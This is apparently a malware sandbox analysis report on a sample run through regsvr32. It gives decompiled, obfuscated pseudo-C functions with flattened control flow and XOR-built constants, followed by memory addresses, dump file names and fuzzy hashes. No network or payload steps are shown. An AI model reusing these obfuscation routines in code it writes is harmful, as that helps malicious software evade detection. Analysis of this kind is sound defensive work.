				if(_t92 != 0) {
					_t126 = 0;
					_t111 = _t92;
					_t124 =  >  ? 0 :  &(_t113[_t118 >> 2]) - _t113 + 3 >> 2;
					if(_t124 != 0) {
						_t93 =  *(_t130 + 0x20);
						do {
							_t99 =  *_t113;
							_t113 =  &(_t113[1]);
							_t100 = _t99 ^ _t93;
							 *_t111 = _t100 & 0x000000ff;
							_t111 = _t111 + 8;
							 *((short*)(_t111 - 6)) = _t100 >> 0x00000008 & 0x000000ff;
							_t101 = _t100 >> 0x10;
							_t126 = _t126 + 1;
							 *((short*)(_t111 - 4)) = _t101 & 0x000000ff;
							 *((short*)(_t111 - 2)) = _t101 >> 0x00000008 & 0x000000ff;
						} while (_t126 < _t124);
						_t92 =  *((intOrPtr*)(_t130 + 0x1c));
					}
					 *((short*)(_t92 +  *(_t130 + 0x24) * 2)) = 0;
				}
				return _t92;
			}

0x04b4e1fe
0x04b4e202
0x04b4e206
0x04b4e20b
0x04b4e20c
0x04b4e211
0x04b4e219
0x04b4e21c
0x04b4e226
0x04b4e22b
0x04b4e233
0x04b4e241
0x04b4e246
0x04b4e250
0x04b4e255
0x04b4e25b
0x04b4e263
0x04b4e26b
0x04b4e273
0x04b4e277
0x04b4e27f
0x04b4e28b
0x04b4e28e
0x04b4e292
0x04b4e29a
0x04b4e29e
0x04b4e2a1
0x04b4e2a3
0x04b4e2a7
0x04b4e2bb
0x04b4e2da
0x04b4e2dc
0x04b4e2df
0x04b4e2e5
0x04b4e2ed
0x04b4e2ef
0x04b4e300
0x04b4e305
0x04b4e307
0x04b4e30b
0x04b4e30b
0x04b4e30d
0x04b4e310
0x04b4e315
0x04b4e31d
0x04b4e323
0x04b4e327
0x04b4e330
0x04b4e331
0x04b4e338
0x04b4e33c
0x04b4e340
0x04b4e340
0x04b4e34b
0x04b4e34b
0x04b4e357

Strings

>Z, xrefs: 04B4E21C

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z
API String ID: 0-2342695272
Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction ID: 5f7a0721c14e42aa52e0e9f610c5b12b06f332a9d19cb1dd439947d1fc59b488
Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction Fuzzy Hash: 8141B1726183119BD304DF29C48585BFBE1FFC8728F494A6EF889A7250D774EA05CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04B355FF, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04B355FF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t75;
				void* _t84;
				signed int _t88;
				signed int _t89;
				void* _t92;
				intOrPtr _t109;
				signed int* _t112;

				_t108 = _a12;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t75);
				_v68 = 0x7ffd4d;
				_t109 = 0;
				_v64 = 0;
				_t112 =  &(( &_v96)[5]);
				_v80 = 0x808dec;
				_v80 = _v80 << 7;
				_t92 = 0x1c7cd09;
				_t88 = 0x24;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 ^ 0xa1de2a47;
				_v84 = 0x460263;
				_v84 = _v84 + 0xffffc38b;
				_v84 = _v84 + 0xffffb2e6;
				_v84 = _v84 ^ 0x0042c6ce;
				_v88 = 0x2af47a;
				_v88 = _v88 + 0xfffff2b2;
				_v88 = _v88 ^ 0xf3d8a894;
				_v88 = _v88 ^ 0xf3ffbcf7;
				_v92 = 0xf8385b;
				_v92 = _v92 / _t88;
				_v92 = _v92 + 0xffff302a;
				_v92 = _v92 ^ 0x00085c4c;
				_v96 = 0xec2811;
				_t89 = 0x6c;
				_v96 = _v96 / _t89;
				_v96 = _v96 | 0xeb0c0969;
				_v96 = _v96 ^ 0x646fa875;
				_v96 = _v96 ^ 0x8f64cfef;
				_v72 = 0x6e85b8;
				_v72 = _v72 + 0x990a;
				_v72 = _v72 + 0xffff81c6;
				_v72 = _v72 ^ 0x00684c5c;
				_v76 = 0xd1f521;
				_v76 = _v76 | 0xdf7ffbcd;
				_v76 = _v76 ^ 0xdff37ac7;
				do {
					while(_t92 != 0x19e170b) {
						if(_t92 == 0x1c7cd09) {
							_t92 = 0x19e170b;
							continue;
						} else {
							if(_t92 == 0x305f804) {
								_t84 = L04B52BF0(_v88,  &_v60, _v92, _v96, _t108);
								_t112 =  &(_t112[3]);
								__eflags = _t84;
								if(__eflags != 0) {
									_t92 = 0xecd5788;
									continue;
								}
							} else {
								_t117 = _t92 - 0xecd5788;
								if(_t92 != 0xecd5788) {
									goto L11;
								} else {
									E04B49D3E( &_v60, _v72, _t117, _v76, _t108 + 0x24);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					L04B322A6(_a8, _v80,  &_v60, _v84);
					_t112 =  &(_t112[2]);
					_t92 = 0x305f804;
					L11:
					__eflags = _t92 - 0xfbce5f5;
				} while (__eflags != 0);
				goto L6;
			}

0x04b35606
0x04b3560a
0x04b3560b
0x04b3560f
0x04b35613
0x04b35614
0x04b35615
0x04b3561a
0x04b35622
0x04b35624
0x04b35628
0x04b3562b
0x04b35635
0x04b3563a
0x04b3564b
0x04b3564e
0x04b35652
0x04b3565a
0x04b35662
0x04b3566a
0x04b35672
0x04b3567a
0x04b35682
0x04b3568a
0x04b35692
0x04b3569a
0x04b356aa
0x04b356ae
0x04b356b6
0x04b356be
0x04b356ca
0x04b356d2
0x04b356d6
0x04b356de
0x04b356e6
0x04b356ee
0x04b356f6
0x04b356fe
0x04b35706
0x04b3570e
0x04b35716
0x04b3571e
0x04b35726
0x04b35726
0x04b35730
0x04b35788
0x00000000
0x04b35732
0x04b35738
0x04b35778
0x04b3577d
0x04b35780
0x04b35782
0x04b35784
0x00000000
0x04b35784
0x04b3573a
0x04b3573a
0x04b3573c
0x00000000
0x04b3573e
0x04b3574e
0x04b3575a
0x04b3575a
0x04b3573c
0x04b35738
0x04b3575e
0x04b35766
0x04b35766
0x04b3579d
0x04b357a2
0x04b357a5
0x04b357aa
0x04b357aa
0x04b357aa
0x00000000

Strings

\Lh, xrefs: 04B35706

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: \Lh
API String ID: 0-2235754405
Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction ID: 9a949ff1d01b670e86fff56fb2cf0c06dc04771036bfd2ec158a96ceba4767ca
Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction Fuzzy Hash: A5418C71208342DFD768CE25D84482FBBE5FFD8318F104A5DF59552260E775EA09CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04B3E640, Relevance: 1.4, Strings: 1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04B3E640(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t68;
				void* _t78;
				signed int _t79;
				void* _t82;
				void* _t97;
				signed int* _t100;

				_t96 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t68);
				_v68 = 0x77f17d;
				_t100 =  &(( &_v88)[4]);
				_v68 = _v68 + 0xffffbc47;
				_v68 = _v68 ^ 0x007a21f6;
				_t97 = 0;
				_v76 = 0xd01664;
				_t82 = 0xf37e824;
				_t79 = 0x2a;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0xc6ac;
				_v76 = _v76 ^ 0x63f53bf0;
				_v84 = 0xca0bb3;
				_v84 = _v84 | 0xec4cd5b6;
				_v84 = _v84 ^ 0xa5b6880a;
				_v84 = _v84 + 0x809e;
				_v84 = _v84 ^ 0x497d3a42;
				_v72 = 0x505b1c;
				_v72 = _v72 | 0xf2745011;
				_v72 = _v72 ^ 0xf27af575;
				_v88 = 0x8ba087;
				_v88 = _v88 + 0x570e;
				_v88 = _v88 + 0xffffc480;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00062f0c;
				_v64 = 0x507489;
				_v64 = _v64 + 0x50d6;
				_v64 = _v64 ^ 0x0059b1d9;
				_v80 = 0x3c915f;
				_v80 = _v80 + 0xba86;
				_v80 = _v80 / _t79;
				_v80 = _v80 + 0x3cb0;
				_v80 = _v80 ^ 0x00080f7c;
				do {
					while(_t82 != 0x5422f69) {
						if(_t82 == 0xc053a7e) {
							__eflags = E04B49D3E( &_v60, _v64, __eflags, _v80, _t96 + 4);
							_t97 =  !=  ? 1 : _t97;
						} else {
							if(_t82 == 0xe18d46d) {
								_t78 = L04B52BF0(_v84,  &_v60, _v72, _v88, _t96);
								_t100 =  &(_t100[3]);
								__eflags = _t78;
								if(__eflags != 0) {
									_t82 = 0xc053a7e;
									continue;
								}
							} else {
								if(_t82 != 0xf37e824) {
									goto L9;
								} else {
									_t82 = 0x5422f69;
									continue;
								}
							}
						}
						L12:
						return _t97;
					}
					L04B322A6(_a4, _v68,  &_v60, _v76);
					_t100 =  &(_t100[2]);
					_t82 = 0xe18d46d;
					L9:
					__eflags = _t82 - 0xc897eb;
				} while (__eflags != 0);
				goto L12;
			}

0x04b3e647
0x04b3e64b
0x04b3e64c
0x04b3e650
0x04b3e651
0x04b3e652
0x04b3e657
0x04b3e65f
0x04b3e662
0x04b3e66c
0x04b3e674
0x04b3e676
0x04b3e67e
0x04b3e68f
0x04b3e690
0x04b3e694
0x04b3e69c
0x04b3e6a4
0x04b3e6ac
0x04b3e6b4
0x04b3e6bc
0x04b3e6c4
0x04b3e6cc
0x04b3e6d4
0x04b3e6dc
0x04b3e6e4
0x04b3e6ec
0x04b3e6f4
0x04b3e6fc
0x04b3e701
0x04b3e709
0x04b3e711
0x04b3e719
0x04b3e721
0x04b3e729
0x04b3e73c
0x04b3e740
0x04b3e748
0x04b3e750
0x04b3e750
0x04b3e756
0x04b3e7cf
0x04b3e7d1
0x04b3e758
0x04b3e75e
0x04b3e77d
0x04b3e782
0x04b3e785
0x04b3e787
0x04b3e789
0x00000000
0x04b3e789
0x04b3e760
0x04b3e766
0x00000000
0x04b3e768
0x04b3e768
0x00000000
0x04b3e768
0x04b3e766
0x04b3e75e
0x04b3e7d5
0x04b3e7dd
0x04b3e7dd
0x04b3e79e
0x04b3e7a3
0x04b3e7a6
0x04b3e7ab
0x04b3e7ab
0x04b3e7ab
0x00000000

Strings

B:}I, xrefs: 04B3E6C4

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B:}I
API String ID: 0-2889142627
Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction ID: 3e2e9f82bd318f44583328c43366517d52e7e27bea3d25eeb6fc326b3075df52
Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction Fuzzy Hash: C2418971608342DBD758CE21E98582BBBE4FBD4759F00095EF581922A0E775EA098F93

Uniqueness

Uniqueness Score: -1.00%

Function 04B37078, Relevance: 1.3, Strings: 1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E04B37078(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t109;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				void* _t132;
				void* _t133;
				signed int _t134;

				_v12 = 0x8f98c8;
				_v12 = _v12 >> 1;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x6b25fb67;
				_v12 = _v12 ^ 0xa7412f1a;
				_v8 = 0xcf53a8;
				_v8 = _v8 + 0xffff4190;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xcc79c588;
				_v8 = _v8 ^ 0xffd9b9f8;
				_v32 = 0xdc21b3;
				_t133 = __ecx;
				_t113 = 0x53;
				_v32 = _v32 / _t113;
				_v32 = _v32 ^ 0x0002aeef;
				_v20 = 0xa54b66;
				_t114 = 0x25;
				_v20 = _v20 / _t114;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00488e30;
				_v28 = 0xf9718f;
				_v28 = _v28 | 0xd1e9f83c;
				_v28 = _v28 + 0xbce;
				_v28 = _v28 ^ 0xd1f9aa01;
				_v16 = 0x596927;
				_t115 = 0x70;
				_v16 = _v16 / _t115;
				_t116 = 0x65;
				_v16 = _v16 / _t116;
				_t117 = 0x1e;
				_v16 = _v16 / _t117;
				_v16 = _v16 ^ 0x0002780a;
				_v24 = 0x48f141;
				_v24 = _v24 << 0xe;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x1e282004;
				_v36 = 0x9232a3;
				_t118 = 0x42;
				_push(_t118);
				_v36 = _v36 / _t118;
				_v36 = _v36 ^ 0x00023701;
				_push(_t118);
				_t109 = E04B4CCA0(_v24, _v36);
				_push(_t133);
				_t134 = _t109;
				_push(_t134);
				_push(_v16);
				_t132 = 3;
				E04B3E404(_v28, _t132);
				 *((short*)(_t133 + _t134 * 2)) = 0;
				return 0;
			}

0x04b3707e
0x04b37087
0x04b3708a
0x04b3708e
0x04b37095
0x04b3709c
0x04b370a3
0x04b370aa
0x04b370ae
0x04b370b5
0x04b370bc
0x04b370ca
0x04b370cc
0x04b370d1
0x04b370d6
0x04b370dd
0x04b370e7
0x04b370ec
0x04b370f1
0x04b370f5
0x04b370fc
0x04b37103
0x04b3710a
0x04b37111
0x04b37118
0x04b37122
0x04b37127
0x04b3712f
0x04b37134
0x04b3713c
0x04b37141
0x04b37146
0x04b3714d
0x04b37154
0x04b37158
0x04b3715b
0x04b37162
0x04b3716c
0x04b3716f
0x04b37170
0x04b37173
0x04b37186
0x04b3718d
0x04b37192
0x04b37193
0x04b37195
0x04b37196
0x04b3719b
0x04b3719f
0x04b371a9
0x04b371b2

Strings

'iY, xrefs: 04B37118

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'iY
API String ID: 0-1691070665
Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction ID: 8ba2f6718f6009bb6f9986ba8cca863d83d2eacc04db3fea3e8454dbe3e36fad
Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction Fuzzy Hash: 7F414672E00219EBEF08DFA5D84A9EEFBB2FB44304F208059D115BB290D7B56A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B46187, Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B46187(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t52;
				void* _t56;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				signed int* _t64;

				_t58 = __ecx;
				_t64 =  &_v36;
				_v12 = 0x9a6334;
				_t59 = 0x428baaa;
				_v8 = 0x1104ea;
				_t62 = 0;
				_v4 = 0;
				_v28 = 0xb15b0c;
				_t61 = __ecx;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0xf86649d6;
				_v28 = _v28 ^ 0xec767c96;
				_v36 = 0x38db19;
				_v36 = _v36 ^ 0x5bdda26a;
				_v36 = _v36 + 0xffff005e;
				_v36 = _v36 | 0xaa371973;
				_v36 = _v36 ^ 0xfbf0c1f1;
				_v32 = 0x2e8edf;
				_v32 = _v32 | 0x3500a324;
				_v32 = _v32 ^ 0x353f0f34;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000af409;
				_v16 = 0xfc04c2;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000f83ee;
				_v20 = 0xce9672;
				_v20 = _v20 | 0xcae5864f;
				_v20 = _v20 ^ 0xcae41209;
				_v24 = 0x20b296;
				_v24 = _v24 | 0x98e19d34;
				_v24 = _v24 ^ 0x98e5764e;
				do {
					while(_t59 != 0x2638d08) {
						if(_t59 == 0x428baaa) {
							_t59 = 0x994f089;
							continue;
						} else {
							if(_t59 == 0x994f089) {
								_push(_t58);
								_t56 = E04B407F0();
								_t64 =  &(_t64[1]);
								_t59 = 0x2638d08;
								_t62 = _t62 + _t56;
								continue;
							}
						}
						goto L7;
					}
					_t58 = _t61 + 4;
					_t52 = E04B4BE8C(_t58, _v32, _v16, _v20, _v24);
					_t64 =  &(_t64[3]);
					_t59 = 0xb7af90a;
					_t62 = _t62 + _t52;
					L7:
				} while (_t59 != 0xb7af90a);
				return _t62;
			}

0x04b46187
0x04b46187
0x04b4618a
0x04b46192
0x04b46197
0x04b461a2
0x04b461a9
0x04b461b2
0x04b461c0
0x04b461c2
0x04b461c6
0x04b461ce
0x04b461d6
0x04b461de
0x04b461e6
0x04b461ee
0x04b461f6
0x04b461fe
0x04b46206
0x04b4620e
0x04b46216
0x04b4621b
0x04b46223
0x04b4622b
0x04b46230
0x04b46238
0x04b46240
0x04b46248
0x04b46250
0x04b46258
0x04b46260
0x04b46268
0x04b46268
0x04b46272
0x04b4628f
0x00000000
0x04b46274
0x04b46276
0x04b46280
0x04b46281
0x04b46286
0x04b46289
0x04b4628b
0x00000000
0x04b4628b
0x04b46276
0x00000000
0x04b46272
0x04b46297
0x04b462a6
0x04b462ab
0x04b462ae
0x04b462b3
0x04b462b5
0x04b462b5
0x04b462c6

Strings

^, xrefs: 04B461E6

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction ID: 948d146b1d7f24abd0eff772ef29a3d9dcfe9c48bfd6053c9fab83b95a2aca41
Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction Fuzzy Hash: 833167712093429FCB18CF25958540FBBE1FBD5748F004A1DF585A6620D3B9EA1E9BD3

Uniqueness

Uniqueness Score: -1.00%

Function 1001929D, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: bcf109f5de06b5c94f6bb42cf1b44ca8dbb3bfcebafd793729c585c81d35ca35
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: E0D15F73C0AAB30A8376C12D415862EEEE2AFC199531BC7E1DCD43F289D136DE8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 10018E7D, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 58f509fdb222ca7060b2eae822090135517dfdc7c002ac52267cef539c7c6eb7
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 07D16073C0AAB30A8376C12D415852EEBE2AFC199531BC7E1DCD43F289D636DE8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 10018A71, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: cc46d25ea22f0c970390981d75405525d0e25b6b0a86731603265a14af2b5516
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 2EC14F73C0AAF30A8375C12D455812AEFE2AFC169531BC7E1DCD43F28992369F8596D0

Uniqueness

Uniqueness Score: -1.00%

Function 1001869D, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: dcda9d5c94f77def7d8943a89e96ba339e92ee3075ebe02bffe06bb3663a938a
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 2AC14D73D0AAF30A8365C12D455812AEAE2AFC158432FC7A1DCD43F289D636DF8597D0

Uniqueness

Uniqueness Score: -1.00%

Function 04B31CA1, Relevance: .1, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04B31CA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v552;
				signed int _v556;
				intOrPtr _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* _t99;
				void* _t109;
				void* _t112;
				signed int _t126;
				signed int _t127;
				signed int* _t131;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t99);
				_v556 = _v556 & 0x00000000;
				_t131 =  &(( &_v600)[4]);
				_v560 = 0x11afe4;
				_v572 = 0x705fac;
				_v572 = _v572 >> 3;
				_t112 = 0x5dfd87c;
				_v572 = _v572 ^ 0x000e0be5;
				_v600 = 0x66ffbc;
				_v600 = _v600 << 5;
				_v600 = _v600 + 0xffffdeb6;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x019de099;
				_v564 = 0xb3cc88;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x000695d5;
				_v576 = 0xedaac2;
				_v576 = _v576 | 0x8d88b270;
				_t126 = 0xa;
				_v576 = _v576 / _t126;
				_v576 = _v576 ^ 0x0e34170c;
				_v568 = 0xd34644;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x68c9882a;
				_v596 = 0xa76cec;
				_v596 = _v596 + 0xf564;
				_v596 = _v596 | 0x7a23d379;
				_t127 = 0x75;
				_v596 = _v596 / _t127;
				_v596 = _v596 ^ 0x010c78ac;
				_v588 = 0xf6d5ff;
				_v588 = _v588 ^ 0x1e4d5d29;
				_v588 = _v588 | 0xf865f4c1;
				_v588 = _v588 ^ 0xfef0a2a0;
				_v592 = 0xc86264;
				_v592 = _v592 + 0xffff9c97;
				_v592 = _v592 << 0xb;
				_v592 = _v592 + 0x20dd;
				_v592 = _v592 ^ 0x3ff909a0;
				_v584 = 0x196fa2;
				_v584 = _v584 >> 3;
				_v584 = _v584 | 0xe537cc6c;
				_v584 = _v584 ^ 0xe53246df;
				_v580 = 0xb6108b;
				_v580 = _v580 + 0xfdd;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x05ba306f;
				do {
					while(_t112 != 0x5b30f91) {
						if(_t112 == 0x5dfd87c) {
							_t109 = E04B4FE2A(_v600, _v564, _v572,  &_v552);
							_t112 = 0xb74f612;
							continue;
						} else {
							if(_t112 == 0xb74f612) {
								_t109 = E04B32F80( &_v520, _v576, _v568, _v596);
								_t131 =  &(_t131[3]);
								_t112 = 0x5b30f91;
								continue;
							}
						}
						goto L7;
					}
					E04B406FE(_v588, _v592, _a8,  &_v520, _v584, _t112,  &_v552, _v580);
					_t131 =  &(_t131[6]);
					_t112 = 0xf20a46f;
					L7:
				} while (_t112 != 0xf20a46f);
				return _t109;
			}

0x04b31cab
0x04b31cb2
0x04b31cb9
0x04b31cba
0x04b31cbb
0x04b31cc0
0x04b31cc5
0x04b31cc8
0x04b31cd2
0x04b31cdf
0x04b31ce4
0x04b31ce6
0x04b31cf3
0x04b31d00
0x04b31d05
0x04b31d0d
0x04b31d12
0x04b31d1a
0x04b31d22
0x04b31d27
0x04b31d2f
0x04b31d37
0x04b31d45
0x04b31d4a
0x04b31d50
0x04b31d58
0x04b31d60
0x04b31d65
0x04b31d6d
0x04b31d75
0x04b31d7d
0x04b31d89
0x04b31d91
0x04b31d95
0x04b31d9d
0x04b31da5
0x04b31dad
0x04b31db5
0x04b31dbd
0x04b31dc5
0x04b31dcd
0x04b31dd2
0x04b31dda
0x04b31de2
0x04b31dea
0x04b31def
0x04b31df7
0x04b31dff
0x04b31e07
0x04b31e0f
0x04b31e14
0x04b31e1c
0x04b31e1c
0x04b31e22
0x04b31e55
0x04b31e5c
0x00000000
0x04b31e24
0x04b31e26
0x04b31e38
0x04b31e3d
0x04b31e40
0x00000000
0x04b31e40
0x04b31e26
0x00000000
0x04b31e22
0x04b31e82
0x04b31e87
0x04b31e8a
